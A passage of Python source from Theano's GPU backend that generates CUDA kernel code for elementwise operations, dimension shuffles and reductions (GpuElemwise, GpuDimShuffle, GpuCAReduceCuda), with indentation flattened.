("npy_float64", "ga_double"),
]:
kop = kop.replace(npy, ga)
return ElemwiseKernel(self.get_params(node), inps + outs, kop,
preamble=support_code)
def c_headers(self):
return ['<numpy_compat.h>', '<gpuarray/types.h>']
def c_support_code(self):
return self.scalar_op.c_support_code()
def _gpu_kernel_code(self, node, nodename):
# This is useless by itself, but will serve an eventual c_code
# implementation
k = self.generate_kernel(node, nodename)
nd = node.inputs[0].type.ndim
res = []
for i in range(0, nd + 1):
res.append(k.render_basic(i, name="elem_" + str(i)) + ';')
res.append(k.contig_src + ';')
return '\n'.join(res)
def gpu_kernels(self, node, nodename):
src = self._gpu_kernel_code(node, nodename)
nd = node.outputs[0].ndim
params = ['uintp']
params.extend('uintp' for _ in range(nd))
num_inputs = len(node.inputs)
num_outputs = len(node.outputs)
for n in range(num_inputs + num_outputs):
if (n - len(node.inputs)) in self.inplace_pattern:
continue
params.extend([gpuarray.GpuArray, 'uintp'])
params.extend('intp' for _ in range(nd))
acc_dtype = getattr(self, 'acc_dtype', None)
if acc_dtype is None:
acc_dtype = node.outputs[0].type.dtype
return [Kernel(code=src, name="elem_%d" % nd, params=params,
flags=Kernel.get_flags(node.inputs[0].type.dtype,
acc_dtype,
node.outputs[0].type.dtype),
objvar='elem_%d_%s' % (nd, nodename))]
def c_code(self, node, name, inputs, outputs, sub):
if node.inputs[0].type.context.kind != 'cuda':
raise MethodNotDefined('cuda only')
nd = node.outputs[0].ndim
fail = sub["fail"]
initial_dims = ','.join('1' for i in xrange(nd))
opname = str(self.scalar_op)
ctx = sub['params']
# check that all inputs have valid dimensions
emitted_inames = {}
num_kernel_params = 1 + nd + len(inputs + outputs) * (2 + nd)
code = """
size_t n_blocks = 0;
size_t threads_per_block = 0;
size_t numEls = 0;
const ssize_t zero = 0;
void *kernel_params[%(num_kernel_params)d] = {0};
int err;
""" % locals()
if nd > 0:
code += """
size_t dims[%(nd)s] = {%(initial_dims)s};
""" % locals()
else:
code += """
size_t *dims = NULL;
"""
for idx, iname in enumerate(inputs):
if iname in emitted_inames:
assert emitted_inames[iname] is node.inputs[idx]
continue
broadcasts = map(int, node.inputs[idx].broadcastable)
broadcasts = ', '.join(map(str, broadcasts))
nd = node.inputs[idx].ndim
if nd > 0:
code += """
int broadcasts_%(iname)s[%(nd)s] = {%(broadcasts)s};
""" % locals()
else:
code += """
int *broadcasts_%(iname)s = NULL;
""" % locals()
emitted_inames[iname] = node.inputs[idx]
# check that all inputs have valid dimensions
emitted_inames = {}
for idx, iname in enumerate(inputs):
if iname in emitted_inames:
continue
code += """
if (%(nd)s != PyGpuArray_NDIM(%(iname)s))
{
PyErr_Format(PyExc_TypeError,
"need %(nd)s dims, not %%u",
PyGpuArray_NDIM(%(iname)s));
%(fail)s;
}
for (int i = 0; i< %(nd)s; ++i)
{
dims[i] = (dims[i] == 1) ? PyGpuArray_DIMS(%(iname)s)[i] : dims[i];
if ((!(broadcasts_%(iname)s[i] &&
PyGpuArray_DIMS(%(iname)s)[i] == 1)) &&
(dims[i] != PyGpuArray_DIMS(%(iname)s)[i]))
{
PyErr_Format(PyExc_ValueError,
"GpuElemwise. Input dimension mis-match. Input"
" %(idx)d (indices start at 0) has shape[%%d] == %%llu"
", but the output's size on that axis is %%llu.",
i,
(unsigned long long)PyGpuArray_DIMS(%(iname)s)[i],
(unsigned long long)dims[i]
);
%(fail)s;
}
}
""" % locals()
emitted_inames[iname] = True
# check that all outputs have valid dimensions
for idx, oname in enumerate(outputs):
typecode = dtype_to_typecode(node.outputs[idx].dtype)
if idx not in self.inplace_pattern.keys():
code += """
for (int i = 0; (i< %(nd)s) && (%(oname)s); ++i) {
if (dims[i] != PyGpuArray_DIMS(%(oname)s)[i])
{
Py_DECREF(%(oname)s);
%(oname)s = NULL;
}
}
if (%(oname)s && !GpuArray_CHKFLAGS(&(%(oname)s->ga), GA_C_CONTIGUOUS))
{
Py_XDECREF(%(oname)s);
%(oname)s = NULL;
}
if (NULL == %(oname)s)
{
%(oname)s = pygpu_empty(%(nd)d, dims,
%(typecode)s, GA_C_ORDER,
%(ctx)s, Py_None);
if (!%(oname)s) {
%(fail)s
}
}
""" % locals()
else:
input_idx = self.inplace_pattern[idx]
iname = inputs[input_idx]
code += """
Py_XDECREF(%(oname)s);
%(oname)s = %(iname)s;
Py_INCREF(%(oname)s);
for (int i = 0; (i< %(nd)s) && (%(oname)s); ++i) {
if (dims[i] != PyGpuArray_DIMS(%(oname)s)[i])
{
PyErr_Format(PyExc_ValueError,
"GpuElemwise. Output dimension mis-match. Output"
" %(idx)d (indices start at 0), working inplace"
" on input %(input_idx)s, has shape[%%i] == %%llu"
", but the output's size on that axis is %%llu.",
i,
(unsigned long long)PyGpuArray_DIMS(%(oname)s)[i],
(unsigned long long)dims[i]
);
Py_DECREF(%(oname)s);
%(oname)s = NULL;
%(fail)s;
}
}
""" % locals()
z = outputs[0]
code += """numEls = PyGpuArray_SIZE(%(z)s);
//first use at least a full warp
threads_per_block = std::min(numEls, (size_t)32); //WARP SIZE
//next start adding multiprocessors
// UP TO NUMBER OF MULTIPROCESSORS, use 30 for now.
n_blocks = std::min(numEls/threads_per_block +
(numEls %% threads_per_block?1:0),
(size_t)30);
// next start adding more warps per multiprocessor
if (threads_per_block * n_blocks < numEls)
threads_per_block = std::min(numEls/n_blocks, (size_t) 256);
""" % locals()
kname = 'elem_%d_%s' % (nd, name)
param = ["(void *)&numEls"]
for i in range(nd):
param.append("(void *)&%(z)s->ga.dimensions[%(i)d]" % dict(z=outputs[0],
i=i))
for n, (name, var) in enumerate(zip(inputs + outputs,
node.inputs + node.outputs)):
if (n - len(inputs)) in self.inplace_pattern:
continue
dtype = dtype_to_ctype(var.dtype)
param.append("(void *)%(name)s->ga.data" % locals())
param.append("(void *)&%(name)s->ga.offset" % locals())
for i in range(nd):
param.append("PyGpuArray_DIMS(%(name)s)[%(i)d] == 1 ? (void *)&zero: (void *)&PyGpuArray_STRIDES(%(name)s)[%(i)d]" % locals())
for n, p in enumerate(param):
code += "kernel_params[%(n)d] = %(p)s;\n" % locals()
code += """
err = GpuKernel_call(&%(kname)s, 1, &threads_per_block, &n_blocks, 0, kernel_params);
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(kname)s: %%s.",
GpuKernel_error(&%(kname)s, err));
%(fail)s;
}
""" % dict(kname=kname, fail=fail)
if config.gpuarray.sync:
code += """
err = GpuArray_sync(&%(z)s->ga);
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(kname)s: %%s.",
GpuKernel_error(&%(kname)s, err));
%(fail)s;
}
""" % locals()
return str(code)
def perform(self, node, inputs, output_storage, ctx):
# Try to reuse the kernel from a previous call to hopefully
# avoid recompiling
if not hasattr(node, '_cache_elemwise_k'):
node._cache_elemwise_k = self.generate_kernel(node, "kcode")
out_shape = []
for values in izip(*[input.shape for input in inputs]):
if any(v == 0 for v in values):
# All non-broadcasted dimensions should be zero
assert max(values) <= 1
out_shape.append(0)
else:
out_shape.append(max(values))
out_shape = tuple(out_shape)
args = copy.copy(inputs)
for n, (stor, out) in enumerate(izip(output_storage, node.outputs)):
if n in self.inplace_pattern:
stor[0] = inputs[self.inplace_pattern[n]]
else:
args.append(ensure_allocated(stor, out_shape, out.type.dtype, ctx))
node._cache_elemwise_k(*args, broadcast=True)
if config.gpuarray.sync:
output_storage[0][0].sync()
def c_code_cache_version(self):
ver = self.scalar_op.c_code_cache_version()
if ver:
return (4, ver)
else:
return ver
class SupportCodeError(Exception):
"""
We do not support certain things (such as the C++ complex struct).
"""
class GpuDimShuffle(HideC, DimShuffle):
"""
DimShuffle on the GPU.
"""
_f16_ok = True
def make_node(self, input):
ctx_name = infer_context_name(input)
res = DimShuffle.make_node(self, input)
otype = GpuArrayType(dtype=res.outputs[0].type.dtype,
broadcastable=res.outputs[0].type.broadcastable,
context_name=ctx_name)
input = as_gpuarray_variable(input, ctx_name)
return Apply(self, [input], [otype()])
def __str__(self):
if self.inplace:
s = "InplaceGpuDimShuffle{%s}"
else:
s = "GpuDimShuffle{%s}"
return s % (','.join(str(x) for x in self.new_order))
def perform(self, node, inp, out):
input, = inp
storage, = out
res = input
res = res.transpose(self.shuffle + self.drop)
shape = list(res.shape[:len(self.shuffle)])
for augm in self.augment:
shape.insert(augm, 1)
res = res.reshape(shape)
if not self.inplace:
res = res.copy()
storage[0] = res
def c_support_code_apply(self, node, name):
def copy_shape(nd_out):
stmts = []
e = 0
for d in range(nd_out):
if d in self.augment:
stmts.append("sh[%s] = 1;" % (d,))
else:
stmts.append("sh[%s] = tmp->ga.dimensions[%s];" % (d, e))
e += 1
return '\n '.join(stmts)
return """
static const unsigned int %(name)s_ax[] = {%(shuffle)s};
static PyGpuArrayObject *%(name)s_f(PyGpuArrayObject *a) {
PyGpuArrayObject *res, *tmp;
size_t sh[%(nd_out)s];
tmp = pygpu_transpose(a, %(name)s_ax);
if (!tmp) return NULL;
%(copy_shape)s
res = pygpu_reshape(tmp, %(nd_out)s, sh, GA_ANY_ORDER, 1, -1);
Py_DECREF(tmp);
return res;
}
""" % dict(shuffle=', '.join(str(a) for a in (self.shuffle + self.drop)),
name=name, nd_out=len(self.new_order),
copy_shape=copy_shape(len(self.new_order)))
def c_code(self, node, name, inputs, outputs, sub):
d = dict(name=name, fail=sub['fail'], inp=inputs[0], out=outputs[0],
nd=len(self.input_broadcastable))
process = """
PyGpuArrayObject *tmp = NULL;
if (%(inp)s->ga.nd != %(nd)s) {
PyErr_SetString(PyExc_TypeError, "input nd");
%(fail)s
}
Py_XDECREF(%(out)s);
%(out)s = %(name)s_f(%(inp)s);
if (%(out)s == NULL) {%(fail)s}
""" % d
if not self.inplace:
process += """
tmp = pygpu_copy(%(out)s, GA_ANY_ORDER);
Py_DECREF(%(out)s);
if (!tmp) {
%(out)s = NULL;
%(fail)s
}
%(out)s = tmp;
""" % d
return process
def c_code_cache_version(self):
return (5,)
class GpuCAReduceCuda(GpuKernelBase, HideC, CAReduceDtype):
"""
GpuCAReduceCuda is a Reduction along some dimensions by a scalar op.
Parameters
----------
reduce_mask
The dimensions along which to reduce. The `reduce_mask` is a tuple of
booleans (actually integers 0 or 1) that specify for each input
dimension, whether to reduce it (1) or not (0).
pre_scalar_op
If present, must be a scalar op with only 1 input. We will execute it
on the input value before reduction.
Examples
--------
When scalar_op is a theano.scalar.basic.Add instance:
- reduce_mask == (1,) sums a vector to a scalar
- reduce_mask == (1,0) computes the sum of each column in a matrix
- reduce_mask == (0,1) computes the sum of each row in a matrix
- reduce_mask == (1,1,1) computes the sum of all elements in a 3-tensor.
Notes
-----
Any reduce_mask of all zeros is a sort of 'copy', and may be removed during
graph optimization.
This Op is a work in progress.
This op was recently upgraded from just GpuSum a general CAReduce. Not
many code cases are supported for scalar_op being anything other than
scal.Add instances yet.
Important note: if you implement new cases for this op, be sure to
benchmark them and make sure that they actually result in a speedup.
GPUs are not especially well-suited to reduction operations so it is
quite possible that the GPU might be slower for some cases.
"""
__props__ = ('axis', 'reduce_mask', 'dtype', 'acc_dtype', 'scalar_op',
'pre_scalar_op')
_f16_ok = True
def __init__(self, scalar_op, axis=None,
reduce_mask=None, dtype=None, acc_dtype=None,
pre_scalar_op=None):
if reduce_mask is not None:
reduce_mask = tuple(reduce_mask)
self.reduce_mask = reduce_mask
# used to make sure that calls to scalar op
# have unique name arguments
self._n_scalar_op_calls = 0
CAReduceDtype.__init__(self, scalar_op, axis=axis,
dtype=dtype, acc_dtype=acc_dtype)
self.pre_scalar_op = pre_scalar_op
if pre_scalar_op:
assert pre_scalar_op.nin == 1
def __str__(self):
pre = ""
if self.pre_scalar_op:
pre = "pre=%s,red=" % str(self.pre_scalar_op)
ax = ''
if self.axis is not None:
ax = '{%s}' % (', '.join(str(x) for x in self.axis),)
return "GpuCAReduceCuda{%s%s}%s" % (pre, str(self.scalar_op), ax)
def __setstate__(self, d):
self.__dict__.update(d)
# For unpickling of old ops.
if not hasattr(self, "pre_scalar_op"):
self.pre_scalar_op = None
def make_node(self, x):
x = as_gpuarray_variable(x, infer_context_name(x))
if x.type.context.kind != 'cuda':
raise TypeError("GpuCAReduceCuda doesn't work for non-cuda devices")
ret = super(GpuCAReduceCuda, self).make_node(x)
self = copy.copy(self)
self.axis = ret.op.axis
if self.pre_scalar_op:
# Currently we only tested pre_scalar_op that don't cause
# upcast.
assert Elemwise(self.pre_scalar_op)(x).dtype == x.dtype
if self.reduce_mask is None:
if self.axis is None:
reduce_mask = [1] * x.type.ndim
else:
reduce_mask = [0] * x.type.ndim
for a in self.axis:
assert reduce_mask[a] == 0
reduce_mask[a] = 1
self.reduce_mask = tuple(reduce_mask)
if (x.type.ndim != len(self.reduce_mask)):
raise TypeError("x must have rank %i" % len(self.reduce_mask))
if ("complex" in x.dtype or
"complex" in ret.outputs[0].dtype or
"complex" in self._acc_dtype(x.dtype)):
raise NotImplementedError("We don't support complex in gpu reduction")
return Apply(self, [x], [GpuArrayType(ret.outputs[0].dtype,
ret.outputs[0].type.broadcastable,
context_name=x.type.context_name)()])
def get_params(self, node):
return node.inputs[0].type.context
def perform(self, node, inp, out, ctx):
theano.Op.perform(self, node, inp, out, ctx)
def supports_c_code(self, inputs):
"""
Returns True if the current op and reduce pattern has functioning C code.
"""
# If we don't even have the right method, we certainly
# don't support the C code
# (This is the test that used to be implemented by
# local_gpu_sum)
pattern = (''.join(str(i) for i in self.reduce_mask))
if not hasattr(self, 'c_code_reduce_%s' % pattern):
return False
# Now that this is a general reduction op, we might
# have a method for a pattern, but that pattern
# might not be implemented for the current scalar op.
# To detect this more complicated situation, we
# make fake arguments to c_code, try to run them,
# and see if NotImplementedError gets raised.
node = self.make_node(*inputs)
name = 'fake_name'
inp = ['fake_input_name_%d' % i for i in xrange(len(inputs))]
out = ['fake_output_name_%d' % i for i in xrange(len(node.outputs))]
sub = {'fail': 'fake failure code', 'params': 'fake context'}
try:
self.c_code(node, name, inp, out, sub)
self.c_support_code_apply(node, name)
except NotImplementedError:
return False
return True
def c_headers(self):
return ['<numpy_compat.h>', '<gpuarray/types.h>']
def c_code(self, node, name, inp, out, sub):
x, = inp
z, = out
nd_in = node.inputs[0].type.ndim
nd_out = node.outputs[0].type.ndim
# For complex, we need to use theano_complex* in the c code to
# have it run. But libgpuarray don't understand it.
in_dtype = node.inputs[0].type.dtype_specs()[1]
out_dtype = node.outputs[0].type.dtype_specs()[1]
gin_dtype = "npy_" + node.inputs[0].dtype
gout_dtype = "npy_" + node.outputs[0].dtype
assert nd_in - nd_out == sum(self.reduce_mask)
sio = StringIO()
fail = sub['fail']
ctx = sub['params']
# check input
print("""
if (PyGpuArray_NDIM(%(x)s) != %(nd_in)s)
{
PyErr_Format(PyExc_TypeError,
"required nd=%(nd_in)s, got nd=%%u", PyGpuArray_NDIM(%(x)s));
%(fail)s;
}
""" % locals(), file=sio)
# It might be nice to use a property of the op class to do this,
# but tensor.elemwise.CAReduce has this exact same check so I guess
# this is OK to do
if self.scalar_op in [scal.minimum, scal.maximum]:
conds = ["(PyGpuArray_DIMS(%s)[%d] == 0)" % (x, i)
for i in xrange(nd_in)
if self.reduce_mask[i]]
assert len(conds) > 0
cond = "(" + " || ".join(conds) + ")"
print("""
if %(cond)s
{
PyErr_Format(PyExc_ValueError," tried to reduce a 0-length axis.");
%(fail)s;
}
""" % locals(), file=sio)
#
# alloc an output if we need one
#
# check the basics of out output
print("""
if ( !%(z)s
|| (PyGpuArray_NDIM(%(z)s) != %(nd_out)s)
""" % locals(), file=sio)
# ensure that the output has the right non-reduced dimensions
j = 0
for i in xrange(nd_in):
if not self.reduce_mask[i]:
print(" || (PyGpuArray_DIMS(%(z)s)[%(j)s] != PyGpuArray_DIMS(%(x)s)[%(i)d]) " % locals(), file=sio)
j += 1
print("""
)
{
""" % locals(), file=sio)
if nd_out > 0:
print("size_t new_dims[%(nd_out)s]; " % locals(), file=sio)
else:
print("size_t *new_dims=NULL; ", file=sio)
j = 0
for i in xrange(nd_in):
if not self.reduce_mask[i]:
print('new_dims[%(j)s] = PyGpuArray_DIMS(%(x)s)[%(i)s];' % locals(), file=sio)
j += 1
out_typecode = dtype_to_typecode(gout_dtype[4:])
print("""
Py_XDECREF(%(z)s);
%(z)s = pygpu_empty(%(nd_out)s, new_dims,
%(out_typecode)s, GA_C_ORDER,
%(ctx)s, Py_None);
if (NULL == %(z)s)
{
PyErr_Format(PyExc_RuntimeError, "Failed to allocate output");
%(fail)s;
}
}
""" % locals(), file=sio)
# \begin bracket the reduction in a check that there is
# actually work to do
if getattr(self.scalar_op, 'identity', None) == 0:
zero_shp = "GpuArray_memset(&%(z)s->ga, 0)" % locals()
# TODO: elif getattr(self.scalar_op, 'identity', None) == 1:
else:
scalar_op = self.scalar_op
zero_shp = """
PyErr_Format(PyExc_NotImplementedError,
"GpuCAReduceCuda not implemented when input shape is 0"
" for this scalar_op: %(scalar_op)s");
%(fail)s;
""" % locals()
print("""
if (PyGpuArray_SIZE(%(z)s) && ! PyGpuArray_SIZE(%(x)s)){
%(zero_shp)s;
}
else if (PyGpuArray_SIZE(%(z)s))
{
""" % locals(), file=sio)
#
# Now perform the reduction
#
if all(i == 1 for i in self.reduce_mask):
# check if the tensor is ccontiguous, if true, use the c_code_reduce_ccontig code.
# TODO: check if we are ccontiguous when we un-dimshuffle
# TODO: if only some dims are ccontiguous, call version with less dims.
print('if(%(x)s->ga.flags & GA_C_CONTIGUOUS){' % locals(),
file=sio)
self.c_code_reduce_ccontig(sio, node, name, x, z, fail)
print("}else{", file=sio)
getattr(self, 'c_code_reduce_%s' %
(''.join(str(i) for i in self.reduce_mask)))(
sio, node, name, x, z, fail)
print("}", file=sio)
else:
getattr(self, 'c_code_reduce_%s' % (''.join(
str(i) for i in self.reduce_mask)))(sio, node, name, x, z, fail)
# \end bracket the reduction ...
print("""
}
""" % locals(), file=sio)
return sio.getvalue()
def _makecall(self, node, name, x, z, fail, pattern=None, extra_dims=(), extra_strides=()):
"""
Return a string for making a kernel call.
The return value looks something like:
.. code-block:: c
ssize_t stride_A0 = PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s);
ssize_t stride_A1 = PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s);
ssize_t stride_Z0 = PyGpuArray_STRIDES(%(z)s)[0]/sizeof(%(out_dtype)s);
if (verbose)
printf("running kernel_reduce_10_%(name)s\\n");
size_t n_shared = sizeof(%(acc_dtype)s) * n_threads[0] * n_threads[1] * n_threads[2];
void *kernel_params[] = {
(void *)&PyGpuArray_DIMS(%(x)s)[0],
(void *)&PyGpuArray_DIMS(%(x)s)[1],
(void *)%(x)s->ga.data,
(void *)&%(x)s->ga.offset,
(void *)&stride_A0,
(void *)&stride_A1,
(void *)%(z)s->ga.data,
(void *)&%(z)s->ga.offset,
(void *)&stride_Z0};
int err = GpuKernel_call(&%(k_var)s, 3, n_threads, n_blocks, n_shared, kernel_params);
%(err_check)s
"""
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
sio = StringIO()
if pattern is None:
pattern = ''.join(str(c) for c in self.reduce_mask)
ndim = len(self.reduce_mask)
nd_out = ndim - sum(self.reduce_mask)
shapes_format = "shape=(%s)" % ",".join(["%llu"] * node.inputs[0].ndim)
shapes_data = ",".join(["(size_t) PyGpuArray_DIMS(%s)[%d]" % (x, i)
for i in range(node.inputs[0].ndim)])
k_var = "kernel_reduce_%(pattern)s_%(name)s" % locals()
params = []
for i in xrange(ndim):
params.append("(void *)&PyGpuArray_DIMS(%(x)s)[%(i)s]" % locals())
for declaration, value in extra_dims:
print(declaration % locals(), file=sio)
params.append(value)
params.append("(void *)%(x)s->ga.data" % locals())
params.append("(void *)&%(x)s->ga.offset" % locals())
for i in xrange(ndim):
print("""
ssize_t stride_A%(i)d = PyGpuArray_STRIDES(%(x)s)[%(i)s]/sizeof(%(in_dtype)s);
""" % locals(), file=sio)
params.append("(void *)&stride_A%(i)d" % locals())
for declaration, value in extra_strides:
print(declaration % locals(), file=sio)
params.append(value)
params.append("(void *)%(z)s->ga.data" % locals())
params.append("(void *)&%(z)s->ga.offset" % locals())
for i in xrange(nd_out):
print("""
ssize_t stride_Z%(i)d = PyGpuArray_STRIDES(%(z)s)[%(i)s]/sizeof(%(out_dtype)s);
""" % locals(), file=sio)
params.append("(void *)&stride_Z%(i)d" % locals())
kernel_params = ', '.join(params)
err_check = """
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(k_var)s: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s;
}
""" % locals()
print("""
if (verbose)
printf("running kernel_reduce_%(pattern)s_%(name)s\\n");
size_t n_shared = sizeof(%(acc_dtype)s) * n_threads[0] * n_threads[1] * n_threads[2];
void *kernel_params[] = { %(kernel_params)s };
if (verbose>1)
printf("n_threads[0]=%%lu, n_threads[1]=%%lu, "
"n_threads[2]=%%lu, n_threads=%%lu, "
"n_blocks[0]=%%lu, n_blocks[1]=%%lu, n_blocks[2]=%%lu, "
"n_blocks=%%lu, n_shared=%%d, %(shapes_format)s\\n",
n_threads[0],n_threads[1],
n_threads[2],
n_threads[0]*n_threads[1]*
n_threads[2],
n_blocks[0],n_blocks[1],n_blocks[2],
n_blocks[0]*n_blocks[1]*n_blocks[2],
n_shared, %(shapes_data)s);
int err = GpuKernel_call(&%(k_var)s, 3, n_threads, n_blocks, n_shared, kernel_params);
%(err_check)s
""" % locals(), file=sio)
sync = ""
if config.gpuarray.sync:
sync = """
err = GpuArray_sync(&%(z)s->ga);
%(err_check)s
""" % locals()
print("""
%(sync)s
""" % locals(), file=sio)
return sio.getvalue()
def _k_decl(self, node, nodename, pattern=None,
ndim=None, reduce_mask=None):
"""
Return a string to declare a kernel function.
The result will look something like this:
.. code-block:: c
KERNEL void kernel_reduce_110_%(nodename)s(
const ga_size d0,
const ga_size d1,
const ga_size d2,
const %(in_type)s *A,
const ga_size offset_A,
const ga_ssize sA0,
const ga_ssize sA1,
const ga_ssize sA2,
%(out_type)s * Z,
const ga_size offset_Z,
const ga_ssize sZ0)
Since the nodename is unique, we don't need to put the name
of the scalar_op in here.
"""
in_dtype = node.inputs[0].dtype
out_dtype = node.outputs[0].dtype
in_type = gpuarray.dtype_to_ctype(in_dtype)
out_type = gpuarray.dtype_to_ctype(out_dtype)
if reduce_mask is None:
reduce_mask = self.reduce_mask
if ndim is None:
ndim = len(reduce_mask)
if pattern is None:
pattern = ''.join(str(i) for i in reduce_mask)
kname = "kernel_reduce_%(pattern)s" % locals()
k_var = "kernel_reduce_%(pattern)s_%(nodename)s" % locals()
params = []
sio = StringIO()
print("""
KERNEL void %(kname)s(
""" % locals(), file=sio)
for i in xrange(ndim):
params.append('uintp')
print("""
const ga_size d%(i)s,
""" % locals(), file=sio)
params.append(gpuarray.GpuArray)
params.append('uintp')
print("""
const %(in_type)s *A, const ga_size offset_A,
""" % locals(), file=sio)
for i in xrange(ndim):
params.append('intp')
print("""
const ga_ssize sA%(i)s,
""" % locals(), file=sio)
params.append(gpuarray.GpuArray)
params.append('uintp')
print("""
%(out_type)s * Z, const ga_size offset_Z
""" % locals(), file=sio)
for i in xrange(ndim - sum(reduce_mask)):
params.append('intp')
print("""
, const ga_ssize sZ%(i)s
""" % locals(), file=sio)
print(")", file=sio)
return sio.getvalue(), kname, params, k_var
def _k_init(self, node, nodename):
in_dtype = node.inputs[0].dtype
out_dtype = node.outputs[0].dtype
acc_dtype = self._acc_dtype(node.inputs[0].dtype)
# We need to use theano_complex* and not npy_complex*
in_type = gpuarray.dtype_to_ctype(in_dtype)
out_type = gpuarray.dtype_to_ctype(out_dtype)
acc_type = gpuarray.dtype_to_ctype(acc_dtype)
return """
const int threadCount = blockDim.x * blockDim.y * blockDim.z;
const int threadNum = threadIdx.z * blockDim.x * blockDim.y
+ threadIdx.y * blockDim.x + threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = 0;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
//This is caught in cuda/init.py when we init the gpu. I keep
//it here to ease finding code that rely on this.
if (warpSize != 32)
{
Z[0] = -666;
return;
}
""" % locals()
def _assign_init(self, first_item):
"""
This return the initial value for myresult.
If the scalar op have an identity value, return it.
Otherwise, check that the scalar op is maximum or minimum
and return first_item. It should be the first element of the reduction.
As the maximum and minimum of the same value don't change, this work.
"""
if hasattr(self.scalar_op, 'identity'):
return str(self.scalar_op.identity)
else:
assert isinstance(self.scalar_op, (scal.Maximum,
scal.Minimum))
if self.pre_scalar_op: # TODO: multiple dtypes
# dtype = node.inputs[0].dtype
dtype = 'float32'
dummy_var = scal.Scalar(dtype=dtype)()
dummy_node = self.pre_scalar_op.make_node(dummy_var)
dummy_name = 'assign_init_pre_scalar_op' + str(self._n_scalar_op_calls)
self._n_scalar_op_calls += 1
t = self.pre_scalar_op.c_code(dummy_node, dummy_name,
(first_item,), ("",), {})
assert t.startswith(' = ')
first_item = t[3:]
if first_item[-1] == ';':
first_item = first_item[:-1]
return first_item
def _assign_reduce(self, node, name, left, right, sub, pre):
"""
Parameters
----------
node
The node argument to this op's c_code.
name
The name argument to this op's c_code.
left
A C code string identifying an lvalue.
right
A C code string identifying an expression.
sub
The sub argument to this op's c_code.
pre
If True, we will add the pre_scalar_op.c_code.
Returns
-------
str
C code to reduce left and right, assigning the result to left.
"""
x, = node.inputs
in_dtype = x.dtype
out_dtype = node.outputs[0].dtype
dummy_left = Scalar(dtype=out_dtype)()
dummy_right = Scalar(dtype=in_dtype)()
dummy_node = self.scalar_op.make_node(dummy_left, dummy_right)
dummy_name = name + '_scalar_op' + str(self._n_scalar_op_calls)
self._n_scalar_op_calls += 1
if pre and self.pre_scalar_op:
assert left == "myresult"
dummy_node = self.pre_scalar_op.make_node(dummy_left)
dummy_name = name + '_scalar_op' + str(self._n_scalar_op_calls)
self._n_scalar_op_calls += 1
t = self.pre_scalar_op.c_code(dummy_node, dummy_name,
(right,), ("",), sub)
assert t.startswith(' = ')
right = t[3:]
if right[-1] == ';':
right = right[:-1]
return self.scalar_op.c_code(dummy_node, dummy_name, (left, right),
(left,), sub)
def _k_reduce_buf(self, z_pos, node, name, sub):
"""
WRITEME
Parameters
----------
node, name, sub
These should be passed through from the original call to c_code.
"""
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
write_out = write_w(node.outputs[0].dtype)
# This code (the code in new_version) is currently ignored.
# Code produced later in this function is returned instead.
# The code here works with all nvidia driver
# But only for powers or multiples of 2!
new_version = """
__syncthreads(); // some kernel do multiple reduction.
buf[threadNum] = myresult;
__syncthreads();
if (threadNum >= ((threadCount >> 1) * 2))
{
int idx = threadNum - (threadCount >> 1) * 2;"""
new_version += self._assign_reduce(node, name, 'buf[idx]',
'buf[threadNum]', sub, False)
new_version += """
}
__syncthreads();
// Works for power of 2 only.
int nTotalThreads = threadCount; // Total number of active threads
while(nTotalThreads > 1)
{
int halfPoint = (nTotalThreads >> 1); // divide by two
// only the first half of the threads will be active.
if (threadNum < halfPoint)
{
// Get the shared value stored by another thread
%(acc_dtype)s temp = buf[threadNum + halfPoint];
"""
new_version += self._assign_reduce(node, name,
'buf[threadNum]', 'temp', sub, False)
new_version += """
}
__syncthreads();
nTotalThreads = (nTotalThreads >> 1); // divide by two.
}
__syncthreads();
if (threadNum == 0)
{
%(z_pos)s = %(write_out)s(buf[0]);
}
__syncthreads();"""
new_version = new_version % locals()
current_version = """
__syncthreads(); // some kernel do multiple reduction.
buf[threadNum] = myresult;
__syncthreads();
// rest of function is handled by one warp
if (threadNum < warpSize)
{
//round up all the partial sums into the first `warpSize` elements
for (int i = threadNum + warpSize; i < threadCount; i += warpSize)
{
"""
current_version += self._assign_reduce(node, name,
'myresult', 'buf[i]',
sub, False) + """
}
buf[threadNum] = myresult;
/*Comment this optimization as it don't work on Fermi GPU.
TODO: find why it don't work or put the GPU compute capability into the version
// no sync because only one warp is running
if(threadCount >32)
{"""
for num in [16, 8, 4, 2, 1]:
current_version += self._assign_reduce(node, name,
'buf[threadNum]',
'buf[threadNum+%d]' % num,
sub, False)
current_version += """
"""
current_version += """
if (threadNum == 0)
{
%(z_pos)s = %(write_out)s(buf[0]);
}
}
else */
if (threadNum < 16)
{
//reduce so that threadNum 0 has the reduction of everything
"""
for num in [16, 8, 4, 2, 1]:
this_if = "if (threadNum + %d < threadCount) " % num + \
self._assign_reduce(node, name,
'buf[threadNum]', 'buf[threadNum+%d]' % num,
sub, False)
current_version += this_if
current_version += """
"""
current_version += """
if (threadNum == 0)
{
%(z_pos)s = %(write_out)s(buf[0]);
}
}
}
"""
current_version = current_version % locals()
return current_version
# Threads must be organized as: threadNum%nb_reduce correspond to the same sum
# nb_reduce<=warpSize
def _k_reduce_buf_multiple(self, z_pos, node, name, nb_reduce):
reduce_fct = self._assign_reduce(node, name, 'myresult', 'buf[i]', {}, False)
write_out = write_w(node.outputs[0].dtype)
return """
__syncthreads(); // some kernel do multiple reduction.
buf[threadNum] = myresult;
__syncthreads();
// rest of function is handled by one warp
if (threadNum < %(nb_reduce)s)
{
//round up all the partial sums into the first `nb_reduce` elements
for (int i = threadNum + %(nb_reduce)s; i < threadCount; i += %(nb_reduce)s)
{
%(reduce_fct)s;
}
%(z_pos)s = %(write_out)s(myresult);
}
""" % locals()
def c_code_reduce_ccontig(self, sio, node, name, x, z, fail):
